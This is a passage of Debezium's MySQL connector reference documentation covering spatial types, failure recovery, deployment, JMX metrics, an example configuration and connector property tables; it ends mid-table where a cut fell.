https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/spatial-datatypes.html[spatial data types]:\n\n[cols=\"20%a,15%a,30%a,35%a\",width=150,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Spatial Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`POINT`\n|`STRUCT`\n|`io.debezium.data.geometry.Point`\n|Contains a structure with 2 `FLOAT64` fields - `(x,y)` - each representing the coordinates of a geometric point, and 1 optional `BYTES` field - `wkb` - representing the Well-Known Binary (WKB) of the coordinates of a geometric point.\n\n|=======================\n\nAs of version 0.7.2, the MySQL connector has full support for all of the following https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/spatial-datatypes.html[spatial data types]:\n\n[cols=\"20%a,15%a,30%a,35%a\",width=150,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Spatial Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`GEOMETRY` +\n`LINESTRING` +\n`POLYGON` +\n`MULTIPOINT` +\n`MULTILINESTRING` +\n`MULTIPOLYGON` +\n`GEOMETRYCOLLECTION`\n|`STRUCT`\n|`io.debezium.data.geometry.Geometry`\n|Contains a structure with 2 fields: +\n\n* `srid (INT32)` - the Spatial Reference System Identifier defining the coordinate system in which the geometry object is defined\n* `wkb (BYTES)` - a binary representation of the geometry object encoded in the Well-Known Binary format.\nPlease see the http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification] for the format details.\n\n|=======================\n
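\nFor instance (column name and coordinates invented), a `POINT(1 1)` value stored in a `location` column would appear in the event, under the `io.debezium.data.geometry.Geometry` representation, roughly as follows, with `wkb` holding the Base64-encoded WKB bytes of the point:\n\n[source,json,indent=0]\n----\n\"location\": {\n \"srid\": 0,\n \"wkb\": \"AQEAAAAAAAAAAADwPwAAAAAAAPA\/\"\n}\n----\n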
\n[[fault-tolerance]]\n[[when-things-go-wrong]]\n=== When things go wrong\n\nDebezium is a distributed system that captures all changes in multiple upstream databases, and will never miss or lose an event. When the system is operating nominally or being administered carefully, Debezium provides _exactly once_ delivery of every change event. However, if a fault does happen, the system will still not lose any events, although while it is recovering from the fault it may repeat some change events. Thus, in these abnormal situations Debezium (like Kafka) provides _at least once_ delivery of change events.\n\nThe rest of this section describes how Debezium handles various kinds of faults and problems.\n\n==== Configuration and startup errors\n\nThe connector will fail upon startup, report an error\/exception in the log, and stop running when the connector's configuration is invalid, when the connector cannot successfully connect to MySQL using the specified connectivity parameters, or when the connector is restarting from a previously-recorded position in the MySQL history (via binlog coordinates or GTID set) and MySQL no longer has that history available.\n\nIn these cases, the error will have more details about the problem and possibly a suggested workaround. The connector can be restarted when the configuration has been corrected or the MySQL problem has been addressed.\n\n==== MySQL becomes unavailable\n\nOnce the connector is running, if the MySQL server it has been connected to becomes unavailable for any reason, the connector will fail with an error and stop. Simply restart the connector when the server is available again.\n\nNote that when using GTIDs and a highly available MySQL cluster, you can simply restart the connector immediately, and the connector will connect to a different MySQL server in the cluster, find the location in that server's binlog that represents the last transaction that was processed completely, and start reading the new server's binlog from that location.\n\nWhen the connector and MySQL are not using GTIDs, the connector records the position within the specific binlog of the MySQL server to which it is connected. These binlog coordinates are only valid on that MySQL server, so the connector can recover only by reconnecting to that server (or to another server that has been recovered from backups of that MySQL server).\n\n==== Kafka Connect process stops gracefully\n\nIf Kafka Connect is being run in distributed mode, and a Kafka Connect process is stopped gracefully, then prior to shutdown of that process Kafka Connect will migrate all of the process's connector tasks to another Kafka Connect process in that group, and the new connector tasks will pick up exactly where the prior tasks left off. There will be a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n==== Kafka Connect process crashes\n\nIf the Kafka Connect process stops unexpectedly, then any connector tasks it was running will terminate without recording their most recently-processed offsets. When Kafka Connect is being run in distributed mode, it will restart those connector tasks on other processes. However, the MySQL connectors will resume from the last offset _recorded_ by the earlier processes, which means that the new replacement tasks may generate some of the same change events that were processed just prior to the crash. The number of duplicate events will depend on the offset flush period and the volume of data changes just before the crash.\n
\n[TIP]\n====\nBecause there is a chance that some events may be duplicated during a recovery from failure, consumers should always anticipate duplicate events. Debezium change events are idempotent, so a sequence of events always results in the same state.\n\nDebezium also includes with each change event message the source-specific information about the origin of the event, including the MySQL server's time of the event, its binlog filename and position, and the GTID (if used). Consumers can keep track of this information (especially GTIDs) to know whether they have already seen a particular event.\n====\n\n==== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka using the Kafka producer API. Kafka Connect will also periodically record the latest offset that appears in those change events, at a frequency you've specified in the Kafka Connect worker configuration. If the Kafka brokers become unavailable, the Kafka Connect worker process running the connectors will simply repeatedly attempt to reconnect to the Kafka brokers. In other words, the connector tasks will simply pause until a connection can be reestablished, at which point the connectors will resume exactly where they left off.\n\n==== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used and any new changes will be recorded in the MySQL server's binlog. When the connector is restarted, it will resume reading the MySQL binlog where it last left off, recording change events for all of the changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is capable of https:\/\/engineering.linkedin.com\/kafka\/benchmarking-apache-kafka-2-million-writes-second-three-cheap-machines[massive throughput]. Kafka Connect is written with Kafka best practices, and given enough resources will also be able to handle very large numbers of database change events. Because of this, when a connector has been restarted after a while, it is very likely to catch up with the database, though how quickly will depend upon the capabilities and performance of Kafka and the volume of changes being made to the data in MySQL.\n\n[NOTE]\n====\nIf the connector remains stopped for long enough, MySQL might purge older binlog files and the connector's last position may be lost. In this case, when a connector configured with the _initial_ snapshot mode (the default) is finally restarted, the MySQL server will no longer have the starting point and the connector will perform an initial snapshot. On the other hand, if the connector's snapshot mode is disabled, then the connector will fail with an error.\n====\n\n[[configuration]]\n[[deploying-a-connector]]\n== Deploying a connector\n\nIf you've already installed https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and http:\/\/kafka.apache.org\/documentation.html#connect[Kafka Connect], then using Debezium's MySQL connector is easy. 
Simply download the https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mysql\/{debezium-version}\/debezium-connector-mysql-{debezium-version}-plugin.tar.gz[connector's plugin archive], extract the JARs into your Kafka Connect environment, and add the directory with the JARs to https:\/\/docs.confluent.io\/current\/connect\/userguide.html#installing-plugins[Kafka Connect's classpath]. Restart your Kafka Connect process to pick up the new JARs.\n\nIf immutable containers are your thing, then check out https:\/\/hub.docker.com\/r\/debezium\/[Debezium's Docker images] for Zookeeper, Kafka, and Kafka Connect with the MySQL connector already pre-installed and ready to go. Our link:http:\/\/debezium.io\/docs\/tutorial[tutorial] even walks you through using these images, and this is a great way to learn what Debezium is all about. You can even link:\/blog\/2016\/05\/31\/Debezium-on-Kubernetes\/[run Debezium on Kubernetes and OpenShift].\n\nTo use the connector to produce change events for a particular MySQL server or cluster, simply create a link:#configuration[configuration file for the MySQL Connector] and use the link:https:\/\/docs.confluent.io\/current\/connect\/references\/restapi.html[Kafka Connect REST API] to add that connector to your Kafka Connect cluster. When the connector starts, it will grab a consistent snapshot of the databases in your MySQL server and start reading the MySQL binlog, producing events for every inserted, updated, and deleted row. The connector can optionally produce events with the DDL statements that were applied, and you can even choose to produce events for a subset of the databases and tables. Optionally ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[[monitoring]]\n=== Monitoring\n\nKafka, Zookeeper, and Kafka Connect all have link:\/docs\/monitoring\/[built-in support] for JMX metrics. The MySQL connector also publishes a number of metrics about the connector's activities that can be monitored through JMX. The connector has two types of metrics. Snapshot metrics help you monitor the snapshot activity and are available when the connector is performing a snapshot. Binlog metrics help you monitor the progress and activity while the connector reads the MySQL binlog.\n\n[[monitoring-snapshots]]\n[[snapshot-metrics]]\n==== Snapshot Metrics\n\n===== *MBean: debezium.mysql:type=connector-metrics,context=snapshot,server=_<database.server.name>_*\n\n[cols=\"30%a,10%a,60%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Attribute Name\n|Type\n|Description\n\n|`TotalTableCount`\n|`int`\n|The total number of tables that are being included in the snapshot.\n\n|`RemainingTableCount`\n|`int`\n|The number of tables that the snapshot has yet to copy.\n\n|`HoldingGlobalLock`\n|`boolean`\n|Whether the connector currently holds a global or table write lock.\n\n|`SnapshotRunning`\n|`boolean`\n|Whether the snapshot was started.\n\n|`SnapshotAborted`\n|`boolean`\n|Whether the snapshot was aborted.\n\n|`SnapshotCompleted`\n|`boolean`\n|Whether the snapshot completed.\n\n|`SnapshotDurationInSeconds`\n|`long`\n|The total number of seconds that the snapshot has taken so far, even if not complete.\n\n|`RowsScanned`\n|`Map<String, Long>`\n|Map containing the number of rows scanned for each table in the snapshot. Tables are incrementally added to the Map during processing. 
Updates every 10,000 rows scanned and upon completing a table.\n|=======================\n\n\n[[monitoring-binlog]]\n[[binlog-metrics]]\n==== Binlog Metrics\n\n===== *MBean: debezium.mysql:type=connector-metrics,context=binlog,server=_<database.server.name>_*\n\n[cols=\"30%a,10%a,60%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Attribute Name\n|Type\n|Description\n\n|`Connected`\n|`boolean`\n|Flag that denotes whether the connector is currently connected to the MySQL server.\n\n|`BinlogFilename`\n|`string`\n|The name of the binlog file that the connector has most recently read.\n\n|`BinlogPosition`\n|`long`\n|The most recent position (in bytes) within the binlog that the connector has read.\n\n|`IsGtidModeEnabled`\n|`boolean`\n|Flag that denotes whether the connector is currently tracking GTIDs from the MySQL server.\n\n|`GtidSet`\n|`string`\n|The string representation of the most recent GTID set seen by the connector when reading the binlog.\n\n|`LastEvent`\n|`string`\n|The last binlog event that the connector has read.\n\n|`SecondsSinceLastEvent`\n|`long`\n|The number of seconds since the connector has read and processed the most recent event.\n\n|`SecondsBehindMaster`\n|`long`\n|The number of seconds between the last event's MySQL timestamp and the connector processing it. The values will incorporate any differences between the clocks on the machines where the MySQL server and the MySQL connector are running.\n\n|`TotalNumberOfEventsSeen`\n|`long`\n|The total number of events that this connector has seen since last started or reset.\n\n|`NumberOfSkippedEvents`\n|`long`\n|The number of events that have been skipped by the MySQL connector. Typically events are skipped due to a malformed or unparseable event from MySQL's binlog.\n\n|`NumberOfEventsFiltered`\n|`long`\n|The number of events that have been filtered by whitelist or blacklist filtering rules configured on the connector.\n\n|`NumberOfDisconnects`\n|`long`\n|The number of disconnects by the MySQL connector.\n\n|`NumberOfCommittedTransactions`\n|`long`\n|The number of processed transactions that were committed.\n\n|`NumberOfRolledBackTransactions`\n|`long`\n|The number of processed transactions that were rolled back and not streamed.\n\n|`NumberOfNotWellFormedTransactions`\n|`long`\n|The number of transactions that did not conform to the expected `BEGIN` + `COMMIT`\/`ROLLBACK` protocol. Should be `0` under normal conditions.\n\n|`NumberOfLargeTransactions`\n|`long`\n|The number of transactions that did not fit into the look-ahead buffer. Should be significantly smaller than `NumberOfCommittedTransactions` and `NumberOfRolledBackTransactions` for optimal performance.\n|=======================\n_Note:_ The transaction-related attributes are available only if binlog event buffering is enabled; see `binlog.buffer.size` for more details.\n\n\n\n[[example]]\n[[example-configuration]]\n=== Example configuration\n\nUsing the MySQL connector is straightforward. 
Here is an example of the configuration for a MySQL connector that monitors a MySQL server at port 3306 on 192.168.99.100, which we logically name `fullfillment`:\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mysql.MySqlConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"3306\", \/\/ <4>\n \"database.user\": \"debezium\", \/\/ <5>\n \"database.password\": \"dbz\", \/\/ <6>\n \"database.server.id\": \"184054\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"database.whitelist\": \"inventory\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\", \/\/ <11>\n \"include.schema.changes\": \"true\" \/\/ <12>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of this MySQL connector class.\n<3> The address of the MySQL server.\n<4> The port number of the MySQL server.\n<5> The name of the MySQL user that has the link:#mysql-user[required privileges].\n<6> The password for the MySQL user that has the link:#mysql-user[required privileges].\n<7> The connector's identifier, which must be unique within the MySQL cluster and is similar to MySQL's `server-id` configuration property.\n<8> The logical name of the MySQL server\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the link:#avro-converter[Avro Converter] is used.\n<9> A list of all databases hosted by this server that this connector will monitor. This is optional, and there are other properties for listing the databases and tables to include or exclude from monitoring.\n<10> The list of Kafka brokers that this connector will use to write and recover DDL statements to the database history topic.\n<11> The name of the link:#database-schema-history[database history topic] where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.\n<12> The flag specifying that the connector should generate events with the DDL changes on the link:#schema-change-topic[schema change topic] named `fullfillment`, which _can_ be used by consumers.\n\nSee the link:#connector-properties[complete list of connector properties] that can be specified in these configurations.\n\nThis configuration can be sent via POST to a running Kafka Connect service, which will then record the configuration and start up the one connector task that will connect to the MySQL database, read the binlog, and record events to Kafka topics.\n\n\n[[connector-properties]]\n=== Connector properties\n\nThe following configuration properties are _required_ unless a default value is available.\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`name`\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|`connector.class`\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium{zwsp}.connector.mysql.MySqlConnector` for the MySQL connector.\n\n|`tasks.max`\n|`1`\n|The maximum number of tasks that should be created for this connector. 
The MySQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|`database.hostname`\n|\n|IP address or hostname of the MySQL database server.\n\n|`database.port`\n|`3306`\n|Integer port number of the MySQL database server.\n\n|`database.user`\n|\n|Name of the MySQL user to use when connecting to the MySQL database server.\n\n|`database.password`\n|\n|Password to use when connecting to the MySQL database server.\n\n|`database.server.name`\n|_host:port_\n|Logical name that identifies and provides a namespace for the particular MySQL database server\/cluster being monitored. The logical name should be unique across all other connectors, since it is used as a prefix for all Kafka topic names emanating from this connector. Defaults to '_host_:_port_', where _host_ is the value of the `database.hostname` property and _port_ is the value of the `database.port` property, though we recommend using an explicit and meaningful logical name.\n\n|`database.server.id`\n|_random_\n|A numeric ID of this database client, which must be unique across all currently-running database processes in the MySQL cluster. This connector joins the MySQL database cluster as another server (with this unique ID) so it can read the binlog. By default, a random number between 5400 and 6400 is generated, though we recommend setting an explicit value.\n\n|`database.history.kafka.topic`\n|\n|The full name of the Kafka topic where the connector will store the database schema history.\n\n|`database.history{zwsp}.kafka.bootstrap.servers`\n|\n|A list of host\/port pairs that the connector will use for establishing an initial connection to the Kafka cluster. This connection will be used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. This should point to the same Kafka cluster used by the Kafka Connect process.\n\n|`database.whitelist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be monitored; any database name not included in the whitelist will be excluded from monitoring. By default all databases will be monitored. May not be used with `database.blacklist`.\n\n|`database.blacklist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be excluded from monitoring; any database name not included in the blacklist will be monitored. May not be used with `database.whitelist`.\n\n|`table.whitelist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables to be monitored; any table not included in the whitelist will be excluded from monitoring. Each identifier is of the form _databaseName_._tableName_. By default the connector will monitor every non-system table in each monitored database. May not be used with `table.blacklist`.\n\n|`table.blacklist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables to be excluded from monitoring; any table not included in the blacklist will be monitored. Each identifier is of the form _databaseName_._tableName_. May not be used with `table.whitelist`.\n\n|`column.blacklist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event message values. 
Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`column.truncate.to._length_.chars`\n|_n\/a_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be truncated in the change event message values if the field values are longer than the specified number of characters. Multiple properties with different lengths can be used in a single configuration, although in each the length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`column.mask.with._length_.chars`\n|_n\/a_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be replaced in the change event message values with a field value consisting of the specified number of asterisk (`*`) characters. Multiple properties with different lengths can be used in a single configuration, although in each the length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`column.propagate.source.type` +\n0.8.0 and later\n|_n\/a_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change messages.\nThe schema parameters `pass:[_]pass:[_]debezium.source.column.type`, `pass:[_]pass:[_]debezium.source.column.length` and `pass:[_]pass:[_]debezium.source.column.scale` will be used to propagate the original type name, length, and scale (for variable-width types), respectively.\nUseful to properly size corresponding columns in sink databases.\nFully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`time.precision.mode`\n|`adaptive_time{zwsp}_microseconds`\n| Time, date, and timestamps can be represented with different kinds of precision, including: `adaptive_time_microseconds` (the default) captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type, with the exception of `TIME` type fields, which are always captured as microseconds; `adaptive` (deprecated) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type; or `connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which use millisecond precision regardless of the database columns' precision. See <<temporal-values>>.\n\n|`decimal.handling.mode` +\n`string` in 0.7.4 and later\n|`precise`\n| Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: `precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form; or `double` represents them using `double` values, which may result in a loss of precision but will be far easier to use. 
The `string` option encodes values as formatted strings, which is easy to consume but loses the semantic information about the real type. See <<decimal-values>>.\n\n|`bigint.unsigned.handling.mode` +\n0.6.1 and later\n|`long`\n| Specifies how `BIGINT UNSIGNED` columns should be represented in change events, including: `precise` uses `java.math.BigDecimal` to represent values, which are encoded in the change events using a binary representation and Kafka Connect's `org.apache.kafka.connect.data.Decimal` type; `long` (the default) represents values using Java's `long`, which may not offer the precision but will be far easier to use in consumers. `long` is usually the preferable setting. The `precise` setting should be used only when working with values larger than 2^63, as those values cannot be conveyed using `long`. See <<data-types>>.\n\n|`include.schema.changes`\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the logical server name specified by `database.server.name`. Each schema change will be recorded using a key that contains the database name and whose value includes the DDL statement(s). This is independent of how the connector internally records database history. The default is `true`.\n\n|`include.query`\n|`false`\n|Boolean value that specifies whether the connector should include the original SQL query that generated the change event. +\nNote: This option requires MySQL to be configured with the `binlog_rows_query_log_events` option set to `ON`. The query will not be present for events generated from the snapshot process. +\nWARNING: Enabling this option may expose tables or fields explicitly blacklisted or masked, by including the original SQL statement in the change event. For this reason, this option defaults to `false`.\n\n|`event.deserialization{zwsp}.failure.handling.mode` +\n0.6.2 and later\n|`fail`\n| Specifies how the connector should react to exceptions during deserialization of binlog events.\n`fail` will propagate the exception (indicating the problematic event and its binlog offset), causing the connector to stop. +\n`warn` will cause the problematic event to be skipped and the problematic event and its binlog offset to be logged\n(make sure that link:\/docs\/configuration\/logging\/[the logger] is set to the `WARN` or `ERROR` level). +\n`ignore` will cause the problematic event to be skipped.\n\n|`inconsistent.schema.handling.mode` +\n0.7.3 and later\n|`fail`\n| Specifies how the connector should react to binlog events that relate to tables that are not present in the internal schema representation (i.e. the internal representation is not consistent with the database).\n`fail` will throw an exception (indicating the problematic event and its binlog offset), causing the connector to stop. +\n`warn` will cause the problematic event to be skipped and the problematic event and its binlog offset to be logged\n(make sure that link:\/docs\/configuration\/logging\/[the logger] is set to the `WARN` or `ERROR` level). +\n`ignore` will cause the problematic event to be skipped.\n\n|`max.queue.size`\n|`8192`\n|Positive integer value that specifies the maximum size of the blocking queue into which change events read from the database log are placed before they are written to Kafka. This queue can provide backpressure to the binlog reader when, for example, writes to Kafka are slow or Kafka is not available. Events that appear in the queue are not included in the offsets periodically recorded by this connector. 
Defaults to 8192, and should always be larger than the maximum batch size specified in the `max.batch.size` property.\n\n|`max.batch.size`\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.\n\n|`poll.interval.ms`\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. Defaults to 1000 milliseconds, or 1 second.\n\n|`connect.timeout.ms`\n|`30000`\n|A positive integer value that specifies the maximum time in milliseconds this connector should wait after trying to connect to the MySQL database server before timing out. Defaults to 30 seconds.\n\n|`gtid.source.includes`\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources matching one of these include patterns will be used. May not be used with `gtid.source.excludes`.\n\n|`gtid.source.excludes`\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources matching none of these exclude patterns will be used. May not be used with `gtid.source.includes`.\n\n|`gtid.new.channel.position` +\n0.9.0 and later\n|`latest`\n| When set to `latest`, when the connector sees a new GTID channel, it will start consuming from the last executed transaction in that GTID channel. If set to `earliest`, the connector starts reading that channel from the first available (not purged) GTID position. `earliest` is useful when you have an active-passive MySQL setup where Debezium is connected to the master; in this case, during failover, the slave with the new UUID (and GTID channel) starts receiving writes before Debezium is connected. These writes would be lost when using `latest`.\n\n|`tombstones.on.delete` +\n0.7.3 and later\n|`true`\n| Controls whether a tombstone event should be generated after a delete event. +\nWhen `true` the delete operations are represented by a delete event and a subsequent tombstone event. When `false` only a delete event is sent. +\nEmitting the tombstone event (the default behavior) allows Kafka to completely delete all events pertaining to the given key once the source record has been deleted.\n\n|`ddl.parser.mode` +\n0.8.0 and later\n|`antlr`\n| Controls which parser should be used for parsing DDL statements when building up the meta-model of the captured database structure. +\nCan be one of `legacy` (for the legacy hand-written parser implementation) or `antlr` (for the new Antlr-based implementation introduced in Debezium 0.8.0). +\nWhile the legacy parser remains the default for Debezium 0.8.x, please try out the new implementation and report back any issues you encounter. 
+\nThe new parser is the default as of 0.9, and the old implementation will be removed in a future version.\n\n|=======================\n\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[cols=\"35%a,10%a,55%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`connect.keep.alive`\n|`true`\n|A boolean value that specifies whether a separate thread should be used to ensure the connection to the MySQL server\/cluster is kept alive.\n\n|`table.ignore.builtin`\n|`true`\n|Boolean value that specifies whether built-in system tables should be ignored. This applies regardless of the table whitelist or blacklists. By default system tables are excluded from monitoring, and no events are generated when changes are made to any of the system tables.\n\n|`database.history.kafka.recovery.poll.interval.ms`\n|`100`\n|An integer value that specifies the maximum number of milliseconds the connector should wait during startup\/recovery while polling for persisted data. The default is 100ms.\n\n|`database.history.kafka.recovery.attempts`\n|`4`\n|The maximum number of times that the connector should attempt to read persisted history data before the connector recovery fails with an error. The maximum amount of time to wait after receiving no data is `recovery.attempts` x `recovery.poll.interval.ms`.\n\n|`database.history.skip.unparseable.ddl`\n|`false`\n|Boolean value that specifies whether the connector should ignore malformed or unknown database statements, or stop processing so that a human can fix the issue.\nThe safe default is `false`.\nSkipping should be used only with care as it can lead to data loss or mangling when the binlog is processed.\n\n|`database.history.store.only.monitored.tables.ddl` +\n0.7.2 and later\n|`false`\n|Boolean value that specifies whether the connector should record all DDL statements or (when `true`) only those that are relevant to tables monitored by Debezium (via the filter configuration).\nThe safe default is `false`.\nThis feature should be used only with care as the missing data might be necessary when the filters are changed.\n\n|`database.ssl.mode`\n|`disabled`\n|Specifies whether to use an encrypted connection. The default is `disabled`, and specifies to use an unencrypted connection.\n\nThe `preferred` option establishes an encrypted connection if the server supports secure connections but falls back to an unencrypted connection otherwise.\n\nThe `required` option establishes an encrypted connection but will fail if one cannot be made for any reason.\n\nThe `verify_ca` option behaves like `required` but additionally verifies the server TLS certificate against the configured Certificate Authority (CA) certificates and will fail if it doesn't match any valid CA certificates.\n\nThe `verify_identity` option behaves like `verify_ca` but additionally verifies that the server certificate matches the host of the remote connection.\n\n|`binlog.buffer.size` +\n0.7.0 and later\n|0\n|The size of a look-ahead buffer used by the binlog reader. +\nUnder specific conditions it is possible that the MySQL binlog contains uncommitted data finished by a `ROLLBACK` statement.\nTypical examples are using savepoints or mixing temporary and regular table changes in a single transaction. 
+\nWhen the beginning of a transaction is detected, Debezium tries to roll forward the binlog position and find either `COMMIT` or `ROLLBACK` so it can decide whether the changes from the transaction will be streamed or not.\nThe size of the buffer defines the maximum number of changes in the transaction that Debezium can buffer while searching for transaction boundaries.\nIf the transaction is larger than the buffer then Debezium needs to rewind and re-read the events that did not fit into the buffer while streaming. Value `0` disables buffering. +\nDisabled by default. +\n_Note:_ This feature should be considered an incubating one. Feedback from users is welcome, but it should not be expected to be completely polished.\n\n|`snapshot.mode`\n|`initial`\n|Specifies the criteria for running a snapshot upon startup of the connector. The default is `initial`, and specifies that the connector can run a snapshot only when no offsets have been recorded for the logical server name. The `when_needed` option specifies that the connector run a snapshot upon startup whenever it deems it necessary (when no offsets are available, or when a previously recorded offset specifies a binlog location or GTID that is not available in the server). The `never` option specifies that the connector should never use snapshots and that upon first startup with a logical server name the connector should read from the beginning of the binlog; this should be used with care, as it is only valid when the binlog is guaranteed to contain the entire history of the database. If you don't need the topics to contain a consistent snapshot of the data but only need them to have the changes since the connector was started, you can use the `schema_only` option, where the connector only snapshots the schemas (not the data).\n\n`schema_only_recovery` is a recovery option for an existing connector to recover a corrupted or lost database history topic, or to periodically \"clean up\" a database history topic (which requires infinite retention) that may be growing unexpectedly.\n\n|`snapshot.locking.mode` +\n_0.7.3 and later_\n|`minimal`\n|Controls if and how long the connector holds onto the global MySQL read lock (preventing any updates to the database) while it is performing a snapshot. There are three possible values: `minimal`, `extended`, and `none`. +\n\n`minimal` The connector holds the global read lock for just the initial portion of the snapshot while the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table, and this can be done in a consistent fashion using the REPEATABLE READ transaction even when the global read lock is no longer held and while other MySQL clients are updating the database. +\n\n`extended` In some cases where clients are submitting operations that MySQL excludes from REPEATABLE READ semantics, it may be desirable to block all writes for the entire duration of the snapshot. For such cases, use this option. +\n\n`none` Will prevent the connector from acquiring any table locks during the snapshot process. This value can be used with all snapshot modes but it is safe to use if and _only_ if no schema changes are happening while the snapshot is taken. Note that tables defined with the MyISAM engine would still be locked despite this property being set, as MyISAM acquires a table lock. 
This behaviour is unlike the InnoDB engine, which acquires row-level locks.\n\n|`snapshot.minimal.locks` +\n_deprecated since 0.7.3_\n|`true`\n|Controls how long the connector holds onto the global MySQL read lock (preventing any updates to the database) while it is performing a snapshot. The default is `true`, meaning the connector holds the global read lock for just the initial portion of the snapshot while the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table, and this can be done in a consistent fashion using the `REPEATABLE READ` transaction even when the global read lock is no longer held and while other\nMySQL clients are updating the database. However, in some cases where clients are submitting operations that MySQL excludes from `REPEATABLE READ` semantics, it may be desirable to _block all writes_ for the entire duration of the snapshot. In only such cases, set this property to `false`. +\n_Deprecated:_ This option has been deprecated and replaced with the `snapshot.locking.mode` configuration option. This option will be removed in a future release. +\n\nA `snapshot.minimal.locks` value of `true` should be replaced with `snapshot.locking.mode` set to `minimal`. +\n\nA `snapshot.minimal.locks` value of `false` should be replaced with `snapshot.locking.mode` set to `extended`.\n\n|`snapshot.select.statement.overrides` +\n0.7.0 and later\n|\n|Controls which rows from tables are included in the snapshot. +\nThis property contains a comma-separated list of fully-qualified tables _(DB_NAME.TABLE_NAME)_. Select statements for the individual tables are specified in further configuration properties, one for each table, identified by the id `snapshot.select.statement.overrides.[DB_NAME].[TABLE_NAME]`. The value of those properties is the SELECT statement to use when retrieving data from the specific table during snapshotting. _A possible use case for large append-only tables is setting a specific point at which to start (resume) snapshotting, in case a previous snapshot was interrupted._ +\n*Note*: This setting affects snapshots only. Events captured from the binlog are not affected by it at all.\n\n|`min.row.count.to.stream.results`\n|`1000`\n|During a snapshot operation, the connector will query each included table to produce a read event for all rows in that table. This parameter determines whether the MySQL connection will pull all results for a table into memory (which is fast but requires large amounts of memory), or whether the results will instead be streamed (can be slower, but will work for very large tables). The value specifies the minimum number of rows a table must contain before the connector will stream results, and defaults to 1,000. Set this parameter to '0' to skip all table size checks and always stream all results during a snapshot.\n\n|`heartbeat.interval.ms` +\n0.7.3 and later\n|`0`\n|Controls how frequently the heartbeat messages are sent. +\nThis property contains an interval in milliseconds that defines how frequently the connector sends heartbeat messages into a heartbeat topic.\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|`heartbeat.topics.prefix` +\n0.7.3 and later\n|`__debezium-heartbeat`\n|Controls the naming of the topic to which heartbeat messages are sent. 
